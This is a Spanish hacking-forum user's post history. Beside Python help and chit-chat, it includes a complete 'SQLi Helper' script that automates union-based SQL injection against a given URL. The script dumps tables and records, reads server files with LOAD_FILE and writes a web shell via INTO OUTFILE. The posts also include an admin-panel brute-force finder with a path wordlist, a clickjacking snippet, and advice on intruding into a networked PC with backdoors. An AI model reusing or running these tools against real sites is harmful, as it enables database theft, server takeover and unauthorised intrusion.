Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#361
Wargames y retos / Re:Acceso a la WEB Facil
Enero 19, 2013, 02:33:05 AM #362
Dudas y pedidos generales / Re:Problema con simple cuestionario
Enero 19, 2013, 01:39:00 AMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vaya que buena ayuda, no sabia que en Python se podia usar un solo "print" para varias lineas, funciona en otros lenguajes?
Sé que para php hay una forma similar de hacer, pero por el momento se me escapa. en otros lenguajes, la verdad lo ignoro
CitarMuchas gracias por el dato de print, y por tu revisión en el codigo, con respecto en la parte del elif f !=2, era 1, solo que estaba experimentando a ver que pasaba, hice lo que me dijiste, pero igual me sigue marcandola como incorrecta a la opcion correcta, jajaja, es extraño
Pon el código (ojala sólo la parte que te da el error) que tienes
Saludos!
#363
Dudas y pedidos generales / Re:Problema con simple cuestionario
Enero 19, 2013, 12:52:40 AM
Hola,
Tu error está acá:
Código: python
raw_input te regresa una cadena y tu estás comparando un entero (no es lo mismo un "1" a un 1) así que la solución es simple y tienes dos opciones:
1) convierte lo que te regresa la función a entero con la función int()
2) Encierra entre "" los números para que Python los tome como cadenas.
Y ahora un pequeño consejo para ahorrar caracteres: en los condicionales no es necesario que uses elif, ya que sólo evaluas dos posibles respuestas, la correcta y la verdadera. Así que puedes acortar code usando sólo else:
Código: python
Haría lo mismo que tu código y te ahorrarias las condiciones
Otro consejo: Puedes evitar hacer tanto print. puedes usar un sólo print y triples comillas (dobles o simples)
Código: python
PD: Te edité el post para que se viera el código.
Saludos!
Tu error está acá:
f= raw_input('ingresa el numero de la respuesta correcta: ')
if f == 1:
print 'Vamos nomas, continuemos con el cuestionario que es facil la cosa'
elif f != 2:
print 'Agggg, eso lo tenes que saber como tu propio nombre'
sys.exit(0)
raw_input te regresa una cadena y tu estás comparando un entero (no es lo mismo un "1" a un 1) así que la solución es simple y tienes dos opciones:
1) convierte lo que te regresa la función a entero con la función int()
2) Encierra entre "" los números para que Python los tome como cadenas.
Y ahora un pequeño consejo para ahorrar caracteres: en los condicionales no es necesario que uses elif, ya que sólo evaluas dos posibles respuestas, la correcta y la verdadera. Así que puedes acortar code usando sólo else:
if f == 1:
print 'Vamos nomas, continuemos con el cuestionario que es facil la cosa'
else:
print 'Agggg, eso lo tenes que saber como tu propio nombre'
sys.exit(0)
Haría lo mismo que tu código y te ahorrarias las condiciones
Otro consejo: Puedes evitar hacer tanto print. puedes usar un sólo print y triples comillas (dobles o simples)
print '''
la funcion de la vitamina E es:
formacion de anticuerpos
formacion de adn,arn y globulos rojos
3- mantenimiento general de la retina
'''
PD: Te edité el post para que se viera el código.
Saludos!
#364
TUTORIALES
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
[ Por Barlan ]
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
[ Por WhiZ ]
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
RETOS
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
CÓDIGOS
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
GUI
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#365
Python / Re:Curso Introductorio a Python con Interfaces graficas TK
Enero 18, 2013, 02:32:54 AM
Muy bueno brother, apenas como para hacerce con una idea acerca de TK
Saludos!
Saludos!
#366
Dudas y pedidos generales / Re:Consulta, intrusión a pc en red.
Enero 13, 2013, 09:56:41 PM
Puedes tratar de explotar una vulnerabilidad en la máquina o puedes hacer un MiTM y tratar de hacer que la otra persona descargue y ejecute un backdoor, o puedes tratar de explotar una vulnerabilidad en el navegador.
Saludos!
Saludos!
#367
Python / Re:SQLi Helper
Enero 13, 2013, 05:18:06 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Buen aporte.
Podrías encodear una función para que el resultado del dump de datos me lo de cifrado en código binario?
Eso no sería un problema, pero ¿lo que necesitas no lo puedes hacer con un conversor?
Saludos!
#368
Bugs y Exploits / Re:ClickJacking a Ciegas - Mas allá de un Alert
Enero 13, 2013, 03:35:37 PM
Me sucede lo mismo, uso Opera
Por cierto, ¿no sería más fácil cambiar el href del link? Algo como esto:
Código: javascript
Saludos!
Por cierto, ¿no sería más fácil cambiar el href del link? Algo como esto:
document.addEventListener("load", asdf, true);
function asdf() {
var X = document.getElementById("fake");
X.addEventListener("mousedown", function () {this.setAttribute("href", "#fake");}, true);
}Saludos!
#369
Off Topic / Re:De que pais eres?
Enero 13, 2013, 02:20:31 PM
Yo soy de Colombia un país un tanto... curioso
Ese es mi país, carajo!!
Saludos!
Ese es mi país, carajo!!
Saludos!
#370
Python / SQLi Helper
Enero 13, 2013, 02:31:43 AM
Buscando en mis backups un par de libros, acabo de encontrar este script que codee hace un buen tiempo ya.
Las opciones que tiene son:
Código: python
En cuanto puedo, reviso el código y codeo una GUI
PD: Desconocia que habia una herramienta con el mismo nombre
Saludos!
You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Las opciones que tiene son:
Citar
Opciones:
1. Sacar Tablas por limit.
2. Sacar Tablas por Group_concat().
3. Sacar Columnas por Limit.
4. Sacar columnas por Group_concat().
5. Sacar Registros.
6. Dumpear Shell.
7. Cargar archivos (read_file).
8. Salir.
#!/usr/bin/python2
# -*- coding: utf-8 -*-
#11Sep
import urllib, os, sys, time, re
# Menu
def menu():
print '''
Opciones:
1. Sacar Tablas por limit.
2. Sacar Tablas por Group_concat().
3. Sacar Columnas por Limit.
4. Sacar columnas por Group_concat().
5. Sacar Registros.
6. Dumpear Shell.
7. Cargar archivos (read_file).
8. Salir.
'''
# Limpiamos la terminal dependiendo del SO
def limpiar():
if sys.platform == 'win32':
os.system('cls')
else:
os.system('clear')
if not os.path.isdir(RUTA +'/logs'):
os.mkdir(RUTA +'/logs')
# Funcion para guardar el log
def guardar(datos):
tmp = open(RUTA + '/logs/%s.txt' % host, 'a')
tmp.write(datos+'\r')
tmp.close()
# Convertir String a Hexadecimal
def hexadecimal(palabra):
tmp=''
for i in palabra:
tmp+=hex(ord(i))
return '0x'+str(tmp.replace('0x', ''))
# Dumpear archivos
def dumpear():
shell = raw_input('Ingrese el codigo de la shell > ')
ruta = raw_input('Ingrese la ruta del archivo (este no puede estar repetido) > ')
shell = shell.replace('\'', '\"')
shell = urllib.quote('\'%s\'' % shell)
ruta = urllib.quote('\'%s\'' % ruta)
inyeccion = inj
inyeccion = inyeccion.replace('-VULNERABLE-', shell)
inyeccion += '+INTO+OUTFILE+%s+--' % ruta
tmp = urllib.urlopen(URL + inyeccion).read()
print 'Revise la ruta para verificar qeu se subio la shell'
raw_input()
# Cargar Archivos
def loadfile():
ruta = raw_input('Ingrese la ruta del archivo a cargar > ')
ruta = urllib.quote('\'%s\'' % ruta)
inyeccion = inj
inyeccion = inyeccion.replace('-VULNERABLE-', 'concat(0x2d494e4943494f2d,LOAD_FILE+(%s),0x2d494e4943494f2d)' % ruta) # -INICIO-
tmp = urllib.urlopen(URL + inyeccion).read()
tmp = tmp.split('-INICIO-')
if (len(tmp) < 2):
print 'No se pudo leer el archivo'
else:
archivo = open(RUTA + '/logs/%sdump.txt' % host, 'a')
archivo.write('\r\n[+] ' + URL + ruta)
archivo.write(tmp[1])
archivo.write('\r\n[-] ' + URL + ruta)
archivo.close()
print 'Revise en la carpeta logs el archivo: %sdump.txt' % host
raw_input()
# Hallar el numero de columnas
def hallar():
error = ('unknown column','mysql_fetch_row','mysql_fetch_assoc','mysql_fetch_array','mysql_numrows')
for y in range(1,100):
inyeccion ='+order+by+%s+--' % str(y)
tmp = urllib.urlopen(URL + inyeccion).read().lower()
for i in error:
if i in tmp:
print '[+] \t <!-- La aplicacion usa %s columnas -->' % str(y - 1)
guardar('\t <!-- La aplicacion usa %s columnas -->' % str(y - 1))
return y - 1
print 'Escaneadas 100 Columnas'
exit()
# Hallar la columna vulnerable
def vulnerable():
inyeccion = '+and+1=0+union+all+select+'
for i in range(1, colvul + 1):
inyeccion += hexadecimal('-COLUMNA%s-' % str(i)) + ','
inyeccion = inyeccion[:len(inyeccion)-1]
inyeccion += '+from+information_schema.tables+--'
for i in range(1, colvul + 1):
tmp = urllib.urlopen(URL + inyeccion).read()
if '-COLUMNA%s-' % str(i) in tmp:
print '\t <!-- Columna vulnerable encontrada en: %s -->' % str(i)
guardar('\t <!-- Columna vulnerable encontrada en: %s -->' % str(i))
inyeccion = inyeccion.replace(hexadecimal('-COLUMNA%s-' % str(i)), 'table_name', 1) #-TABLAS-
tmp = urllib.urlopen(URL + inyeccion).read()
if 'CHARACTER_SETS' in tmp:
inyeccion = inyeccion.replace('table_name', '-VULNERABLE-', 1)
inyeccion = inyeccion.replace('+from+information_schema.tables+--', '')
return inyeccion
print 'No se encontraron columnas vulnerables'
exit()
# Hallar datos relevantes
def datos():
inyeccion=inj
# Usuario
inyeccion = inyeccion.replace('-VULNERABLE-','concat(0x2d534550415241444f522d,user(),0x2d534550415241444f522d)')#-SEPARADOR-
tmp = urllib.urlopen(URL + inyeccion).read()
tmp = tmp.split('-SEPARADOR-')
print '\r\n\t <!-- El usuario es %s -->' % str(tmp[1])
guardar('\r\n\t <!-- El Usuario es: %s -->'% str(tmp[1]))
# Base de Datos
inyeccion = inyeccion.replace('user()','database()')
tmp = urllib.urlopen(URL + inyeccion).read()
tmp = tmp.split('-SEPARADOR-')
print '\t <!-- La BD es: %s -->' % str(tmp[1])
guardar('\t <!-- La BD es: %s -->'% str(tmp[1]))
# Version MySQL
inyeccion = inyeccion.replace('database()','version()')
tmp = urllib.urlopen(URL + inyeccion).read()
tmp = tmp.split('-SEPARADOR-')
print '\t <!-- La version de MySQL es: %s -->\r\n'% str(tmp[1])
guardar('\t <!-- La version de MySQL es: %s -->\r\n'% str(tmp[1]))
# Sacar Tablas por Limit
def tablaslimit():
try:
print '\t <!-- Buscando Tablas por Limit -->'
guardar('\t <!-- Buscando Tablas por Limit -->')
inyeccion = inj
inyeccion = inyeccion.replace('-VULNERABLE-', 'concat(0x2d5441424c41533a2d,table_name,0x2d5441424c41533a2d)') #-TABLAS:-
inyeccion += '+from+information_schema.tables+limit+-1,1+--'
contador = 0
while True:
inyeccion = inyeccion.replace('+limit+%s,1+--' % str(contador - 1), '+limit+%s,1+--' % str(contador))
tmp = urllib.urlopen(URL + inyeccion).read()
tmp = tmp.split('-TABLAS:-')
if len(tmp) < 2:
print '\t <!-- %s Tablas Encontradas -->' % str(contador)
guardar('\t <!-- %s Tablas Encontradas -->' % str(contador))
break
else:
print tmp[1]
guardar(tmp[1])
contador += 1
raw_input()
except KeyboardInterrupt:
return()
#Sacar Tablas por Group
def tablasgroup():
print '\t <!-- Buscando Columnas por Group -->'
guardar('\t <!-- Buscando Columnas por Group -->')
inyeccion = inj
inyeccion = inyeccion.replace('-VULNERABLE-','concat(0x2d5441424c41533a2d,replace(group_concat(table_name),0x2c,0x3c62723e),0x2d5441424c41533a2d)') #-TABLAS:-
inyeccion += '+from+information_schema.tables+--'
tmp = urllib.urlopen(URL + inyeccion).read()
tmp = tmp.split('-TABLAS:-')
tmp[1] = tmp[1].replace('<br>','\n')
print tmp[1]
guardar(tmp[1])
tmp = len(tmp[1].split('\n'))
print '\t <!-- %i Tablas Encontradas -->' % tmp
guardar('\t <!-- %i Tablas Encontradas -->' % tmp)
raw_input()
# Sacar Columnas dependiendo de la tabla por limit
def columnaslimit(tabla):
print '\r\n\t <!-- Buscando Columnas de la Tabla: %s por Limit -->' % tabla
guardar('\r\n\t <!-- Buscando Columnas de la Tabla: %s por Limit -->' % tabla)
inyeccion = inj
inyeccion = inyeccion.replace('-VULNERABLE-','concat(0x2d434f4c554d4e41533a2d,column_name,0x2d434f4c554d4e41533a2d)')#-COLUMNAS:-
inyeccion += '+from+information_schema.columns+where+table_name=%s+limit+-1,1+--' % hexadecimal(tabla)
contador = 0
while True:
inyeccion = inyeccion.replace('+limit+%s,1+--' % str(contador - 1), '+limit+%s,1+--' % str(contador))
tmp = urllib.urlopen(URL + inyeccion).read()
tmp = tmp.split('-COLUMNAS:-')
if len(tmp) < 2:
print '\t <!-- %s Columnas encontradas en la Tabla %s -->' % (str(contador), tabla)
guardar('\t <!-- %s Columnas encontradas en la Tabla %s -->' % (str(contador), tabla))
break
else:
print tmp[1]
guardar(tmp[1])
contador += 1
raw_input()
# Sacar Columnas Dependiendo de la tabla por Group
def columnasgroup(tabla):
print '\r\n\t <!-- Buscando columnas de la Tabla %s por Group_concat() -->' % tabla
guardar('\r\n\t <!-- Buscando columnas de la Tabla %s por Group_concat() -->' % tabla)
inyeccion = inj
inyeccion = inyeccion.replace('-VULNERABLE-', 'concat(0x2d434f4c554d4e41533a2d,replace(group_concat(column_name),0x2c,0x3c62723e),0x2d434f4c554d4e41533a2d)')#-COLUMNAS:-
inyeccion += '+from+information_schema.columns+where+table_name=%s+--' % hexadecimal(tabla)
tmp = urllib.urlopen(URL + inyeccion).read()
tmp = tmp.split('-COLUMNAS:-')
tmp[1] = tmp[1].replace('<br>','\n')
print tmp[1]
guardar(tmp[1])
tmp = len(tmp[1].split('\n'))
print '\t <!-- %s Columnas encontradas en la Tabla: %s -->' % (str(tmp), tabla)
guardar('\t <!-- %s Columnas encontradas en la Tabla: %s -->' % (str(tmp), tabla))
raw_input()
# Sacar Registros de la columna
def registros():
columna = raw_input('Ingrese el nombre de la Tabla > ')
registro = raw_input('Ingrese el nombre del campo(s) > ')
print '\r\n\t <!-- sacando Registros de la Columna: %s -->' % columna
guardar('\r\n\t <!-- sacando Registros de la Columna: %s -->' % columna)
registro = registro.replace(' ','')
registro = registro.split(',')
reg = ''
for i in registro:
reg += '%s,%s,' % (hexadecimal(' %s:' % i), i)
inyeccion = inj
inyeccion = inyeccion.replace('-VULNERABLE-','concat(0x2d534550415241444f523a2d,%s0x2d534550415241444f523a2d)' % reg)#-SEPARADOR:-
inyeccion += '+from+%s+limit+-1,1+--' % columna
contador = 0
while True:
inyeccion = inyeccion.replace('+limit+%s,1+--' % str(contador - 1), '+limit+%s,1+--' % str(contador))
tmp = urllib.urlopen(URL + inyeccion).read()
tmp = tmp.split('-SEPARADOR:-')
if len(tmp) < 2:
print '\t <!-- %i Registros encontrados en la columna: %s -->' % (contador, columna)
guardar('\t <!-- %i Registros encontrados en la columna: %s -->' % (contador, columna))
break
else:
print tmp[1]
guardar(tmp[1])
contador += 1
raw_input()
# ######################### #
# #
# INICIO #
# #
# ######################### #
#Inyeccion Original remplazar -VULNERABLE-
# buscamos nuestra ruta
RUTA = sys.path[0]
# Limpiamos la terminal
limpiar()
print r'''
____ ___
/\ _`\ /\_ \ __
\ \,\L\_\ __ \//\ \ /\_\
\/_\__ \ /'__`\ \ \ \ \/\ \
/\ \L\ \/\ \L\ \ \_\ \_\ \ \
\ `\____\ \___, \/\____\\ \_\
\/_____/\/___/\ \/____/ \/_/
\ \_\
\/_/
__ __ ___ ____
/\ \/\ \ /\_ \ /\ _`\
\ \ \_\ \ __\//\ \ _____ __\ \ \L\ \
\ \ _ \ /'__`\\ \ \ /\ '__`\ /'__`\ \ , /
\ \ \ \ \/\ __/ \_\ \_\ \ \L\ \/\ __/\ \ \\ \
\ \_\ \_\ \____\/\____\\ \ ,__/\ \____\\ \_\ \_\
\/_/\/_/\/____/\/____/ \ \ \/ \/____/ \/_/\/ /
\ \_\
\/_/
'''
URL = raw_input('[+] Ingrese la url > ')
if re.match('^http://.+', URL.lower()):
host = URL.split('/')[2]
else:
print 'Uso: http://web/pagina?variable=datos'
exit()
print '[+] [%s] Inicio Buscando en: %s [+]' % (str(time.ctime()), host)
guardar('\r\n\t [+] Escan realizado: %s [+]' % str(time.ctime()))
guardar(URL)
# Buscanmos la cantidad de columnas
colvul = hallar()
# Buscamos la columna vulnerable, la que printea los datos de la BD
inj = vulnerable()
# Datos, Verion de MySQL, Usuario, BD
datos()
while True:
menu()
opt = raw_input('Ingrese la opcion > ')
if opt == '1':
tablaslimit()
elif opt == '2':
tablasgroup()
elif opt == '3':
columnaslimit(raw_input('Ingrese el nombre de la tabla > '))
elif opt == '4':
columnasgroup(raw_input('Ingrese el nombre de la tabla > '))
elif opt == '5':
registros()
elif opt == '6':
dumpear()
elif opt == '7':
loadfile()
elif opt == '8':
break
else:
print 'Opcion incorrecta'
continue
print '[-] [%s] Finalizado. [-]' % str(time.ctime())
guardar('[-] [%s] Finalizado. [-]' % str(time.ctime()))
En cuanto puedo, reviso el código y codeo una GUI
PD: Desconocia que habia una herramienta con el mismo nombre
Saludos!
#371
Python / Re:HideMyAss [PyQt4]
Enero 10, 2013, 05:43:00 PM
Está genial brother, gracias por traerlo
Saludos!
Saludos!
#372
Python / Re:[PyQt4] Admin Panel Finder
Enero 10, 2013, 05:21:49 PM
Gracias por los comentarios y espero les sea útil el code. @ANTRAX ahí lo modifiqué y le añadí el logo.
Saludos!
Saludos!
#373
Python / [PyQt4] Admin Panel Finder
Enero 10, 2013, 03:07:18 PMYou are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login
#!/usr/bin/python2
# -*- coding:utf-8 -*-
#11Sep
from PyQt4 import QtCore, QtGui
import sys
import time
import httplib
class GUI(QtGui.QWidget):
def __init__(self):
QtGui.QWidget.__init__(self)
self.setWindowTitle("Admin Panel Finder")
self.resize(500, 300)
self.Caja = QtGui.QVBoxLayout()
self.Caja1 = QtGui.QHBoxLayout()
self.Caja2 = QtGui.QHBoxLayout()
self.Caja3 = QtGui.QHBoxLayout()
self.Caja4 = QtGui.QHBoxLayout()
self.Caja5 = QtGui.QHBoxLayout()
self.Caja6 = QtGui.QHBoxLayout()
self.txtUrl = QtGui.QLineEdit()
self.btnBuscar = QtGui.QPushButton('Buscar')
self.connect(self.btnBuscar, QtCore.SIGNAL("clicked()"), self.Buscar)
self.lista = QtGui.QTextEdit()
self.barraProgreso = QtGui.QProgressBar()
self.barraProgreso.setMinimum(0)
self.barraProgreso.setMaximum(100)
self.btnParar = QtGui.QPushButton("Parar")
self.btnParar.setEnabled(False)
self.connect(self.btnParar, QtCore.SIGNAL("clicked()"), lambda: self.thread.terminate())
self.btnLimpiar = QtGui.QPushButton("Limpiar")
self.connect(self.btnLimpiar, QtCore.SIGNAL("clicked()"), self.Limpiar)
self.status = QtGui.QStatusBar()
self.banner = QtGui.QPixmap("logo.png")
self.asd = QtGui.QLabel("")
self.Caja1.addWidget(QtGui.QLabel(u'Dirección:'))
self.Caja1.addWidget(self.txtUrl)
self.Caja1.addWidget(self.btnBuscar)
self.Caja2.addWidget(self.lista)
self.Caja3.addWidget(self.barraProgreso)
self.Caja4.addWidget(self.btnParar)
self.Caja4.addWidget(self.btnLimpiar)
self.Caja5.addWidget(self.status)
self.Caja6.addWidget(self.asd)
self.asd.setPixmap(self.banner)
self.asd.setStyleSheet("background: rgba(0, 0, 0); border-radius: 50px;")
self.Caja.addLayout(self.Caja6)
self.Caja.addLayout(self.Caja1)
self.Caja.addLayout(self.Caja2)
self.Caja.addLayout(self.Caja4)
self.Caja.addLayout(self.Caja3)
self.Caja.addLayout(self.Caja5)
self.setLayout(self.Caja)
def Buscar(self):
global URL
URL = str(self.txtUrl.text())
self.btnParar.setEnabled(True)
self.thread = Thread()
self.connect(self.thread, QtCore.SIGNAL("Barra"), self.Actualizar)
self.connect(self.thread, QtCore.SIGNAL("Mensaje"), self.Anadir)
self.connect(self.thread, QtCore.SIGNAL("Status"), lambda X: self.status.showMessage(X))
self.thread.start()
def Actualizar(self, Valor):
self.barraProgreso.setValue(Valor)
def Anadir(self, Datos):
Datos = Datos.split("*")
if Datos[1] == "200":
self.lista.append('<font color="green">%s</font>' % (URL + "/" + Datos[0] + " " + Datos[1]))
else:
self.lista.append('<font color="orange">%s</font>' % (URL + "/" + Datos[0] + " " + Datos[1]))
def Limpiar(self):
self.txtUrl.setText("")
self.lista.setText("")
self.btnParar.setEnabled(False)
class Thread(QtCore.QThread):
def __init__(self):
QtCore.QThread.__init__(self)
def __del__(self):
self.wait()
def run(self):
self.Buscar()
def Panels(self):
self.Emitir("Abriendo lista de paneles", 3)
self.Panel = open("panel.txt", "r").read()
self.Panel = self.Panel.split()
def Buscar(self):
self.Panels()
for i in self.Panel:
print i,
Mensaje = "Verificando: " + i
self.Emitir(Mensaje, 3)
Conn = httplib.HTTPConnection(URL)
Conn.request("GET", "/" + i)
r1 = Conn.getresponse()
print r1.status
if r1.status == 200 or r1.status == 301:
Mensaje = i + "*" + str(r1.status)
self.Emitir(str(Mensaje), 2)
self.Emitir((self.Panel.index(i) * 100) / len(self.Panel))
def Emitir(self, Mensaje, Opt=1):
time.sleep(0.3)
if Opt == 1:
self.emit(QtCore.SIGNAL("Barra"), Mensaje)
elif Opt == 2:
self.emit(QtCore.SIGNAL("Mensaje"), Mensaje)
else:
self.emit(QtCore.SIGNAL("Status"), Mensaje)
if __name__ == '__main__':
App = QtGui.QApplication(sys.argv)
Ini = GUI()
Ini.show()
App.exec_()
Para funcionar, necesita una lista con los paneles en la misma carpeta donde este el script con el nombre panel.txt. Acá dejo una que encontre hace un tiempo
cpanel/ admin.php admin/ administrator/ webadmin/ adminarea/ bb-admin/ adminLogin/ admin_area/ panel-administracion/ instadmin/ memberadmin/ administratorlogin/ adm/ admin/account.php admin/index.php admin/login.php admin/admin.php admin/account.php joomla/administrator login.php admin_area/admin.php admin_area/login.php siteadmin/login.php siteadmin/index.php siteadmin/login.html admin/account.html admin/index.html admin/login.html admin/admin.html admin_area/index.php bb-admin/index.php bb-admin/login.php bb-admin/admin.php admin/home.php admin_area/login.html admin_area/index.html admin/controlpanel.php admincp/index.asp admincp/login.asp admincp/index.html admin/account.html adminpanel.html webadmin.html webadmin/index.html webadmin/admin.html webadmin/login.html admin/admin_login.html admin_login.html panel-administracion/login.html admin/cp.php cp.php administrator/index.php administrator/login.php nsw/admin/login.php webadmin/login.php admin/admin_login.php admin_login.php administrator/account.php
